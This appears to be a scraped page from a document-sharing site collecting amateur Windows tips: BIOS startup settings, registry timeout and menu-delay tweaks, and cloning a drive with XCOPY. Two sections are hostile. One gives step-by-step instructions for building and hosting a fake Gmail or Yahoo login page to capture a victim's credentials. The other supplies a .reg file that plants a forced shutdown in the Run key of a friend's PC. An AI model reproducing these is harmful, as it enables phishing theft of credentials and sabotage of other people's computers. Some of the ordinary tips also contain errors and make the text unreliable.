Vous êtes sur la page 1sur 5

make system faster using BIOS

You can speed up your startup procedures by changing the BIOS with the built-in
setup utility. How you run this utility varies from PC to PC, but you typically
get to it
by pressing the Delete, F1, or F10 keys during startup. You'll come to a menu wi
th a
variety of choices. Here are the choices to make for faster system startups:
Quick Power On Self Test (POST)
When you choose this option, your system runs an abbreviated POST rather than th
e
normal, lengthy one.
Boot Up Floppy Seek
Disable this option. When it's enabled, your system spends a few extra seconds
looking for your floppy drivea relatively pointless procedure, especially consid
ering
how infrequently you use your floppy drive.
Boot Delay
Some systems let you delay booting after you turn on your PC so that your hard d
rive
gets a chance to start spinning before bootup. Most likely, you don't need to ha
ve this
boot delay, so turn it off. If you run into problems, however, you can turn it b
ack on
---------------------------------------
Reducing the Wait Time
When you start to shut down Windows XP, it has to quit, or "kill," any live
applications or processes that are currently running. So close all applications
first.
However, some applications and processes are always running in the background.
You can reduce the amount of time that Windows XP waits for those applications a
nd
processes to close before Windows XP kills them
1. Open registry editor
2. Navigate to HKEY_USERS\.DEFAULT\Control Panel\Desktop. Set the
WaitToKillAppTimeout and set the value to 1000. Select the HungAppTimeout
\newline value and set it to 1000 as well.
3. Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control.
Select the WaitToKillServiceTimeout value and set it to 10000.
4. Close the Registry Editor
----------------------------
Speed up your Star MEnu
Hey.. Speed up ur Start Menu...
As...The default setting of Windows causes a slight delay when opening the sub c
ategories of the start menu.....
That is why we need to hover the mouse on it for about half a second.....
You can change this default setting by following these steps.....
1. Go to start==> run==> Type regedit. Press enter.....
2. Navigate to "HKEY_CURRENT_USER----> Control Panel."
3. Click on Desktop.
4. On the right pane look out for 'MenuShowDelay'....(If you can't find it right
-click and create a new 'Multi-String Value' and rename it as 'MenuShowDelay')
5. The default setting is 400....
6. Double click it to modify it....
7. Set it to 0 and there will be no delay...
8. Exit registry and reboot.
However making it zero makes it difficult to move the mouse without accidentally
opening other folders. So try giving some lower values and choose the one which
best suits you. ..
--------------------------------
Crate fack login pages in 15 steps
{1} Open www.jotform.com and Sign Up.
{2} Then Login there with your newly registered account.
{3} Now click on ' Create your first form'.
{4} Now delete all the pre-defined entries, just leave 'First Name:'. (To delete
entries, select the particular entry and then click on the cross sign.)
{5} Now Click on 'First Name:' (Exactly on First Name). Now the option to Edit t
he First Name is activated, type there "username:" (for gmail) or YahooId: (for
Yahoo)
{6} Now Click on 'Power Tool' Option (In right hand side...)
{7} Double click on 'PasswordBox'. Now Click the newly form password entry to ed
it it. Rename it as 'Password:'
{8} Now Click on 'Properties' Option (In right hand side...). These are the form
properties.
{9} You can give any title to your form. This title is used to distinguish your
forms. This Title cannot be seen by the victim.
{10} Now in ThankYou URL you must put some link, like http://www.google.com or a
nything. Actually after entering username & password, user will get redirect to
this url.(Don't leave it blank...)
{11} Now Click on 'Save'. After saving, click on 'Source' Option.
{12} Now you can see two Options, namely 'Option1' & 'Option2'. Copy the full co
de of 'Option2'.
{13} Now open Notepad text editor and write the following code their.

Paste the Option2 code here

{14} And now save this as index.html. Now we have to put this index.html on inte
rnet. I mean now we are going to host this file. For this we will use FREE hosti
ng provider service. You can try the following FREE hosting providers. Make a fr
ee hosting account and come back here...

http://www.webng.com
http://www.atspace.com
{15} I hope u have succesfully created a free hosting account. Now Login in your
hosting account. And then Open 'File Manager'.
{16} Upload this index.html there... now u can see your index.html online by typ
ing the url (url will be given to you by your free hosting provider..)
FINISHED

-------------------------------------------
How to Clone a Hard Drive
Did know that you could clone your current Hard Drive without having to by extra
software? Maybe you didn't know that all that you needed, was already set up on
your current system? Well, it is... and if you follow this tut, you shouldn't h
ave much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave dri
ve, in this case, is where all the data on the Master is going to go to.
First: Perform a Scandisk your Master drive and follow that with a thorough Defr
ag. If you have an Antivirus program, do a thorough sweep with the AV first, the
n do the Scandisk, followed by the Defrag.
Second: Do the same thing to the target drive, as you did the Master: Scandisk t
hen a thorough Defrag.
Third: Right-click on the Target drive and click on Format. When the box comes u
p, click your mouse onto the "Full" button.
Fourth: After Formatting the Target drive, run a Scandisk again and click on the
button that says "Autofix Errors".
Fifth: In this final part, you might want to cut-and-paste to code in, unless yo
u are sure that you can do it without making any mistakes:
Click on the "Start" button, then click on the "Run..." button, then place the f
ollowing into the Runbox:
"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter
" button.
If you receive an error message, then remove the space from between XCOPY and C:
\
Anything that should happen to come up in the DOS box, just click "Y" for "Yes".
When its all finished, pull the original Master from the system, designate the
Slave as the Master (change your jumpers), then check your new Master out.
This tut has worked and has been tested on all systems except for Windows 2000,
so you really shouldn't have any problems. If, by any chance, you should come ac
ross a snag, message me and I'll walk you through it.

------------------------------------------
Shutdown your friend's computer everytime it start
Thats really easy.
put this followin text in a .reg file and run it in the victims pc:

Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W
indows\CurrentVersion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"

DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start w


indows in safe mode, and open registry editor by typiing REGEDIT in start->run.
navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]an
d remove the string value named VIRUS, restart you computer.
You can also put this in a javascript code, just add this code to your webpage:

Be careful, a drawback of the js code is that NORTON ANTIVIRUS's script blocking


feature may block this.
well i am also trying to find the method which executes without any drawbacks. S
o if u have one, pls post it here.
ENJOY !!!

-------------------------------------------

Vous aimerez peut-être aussi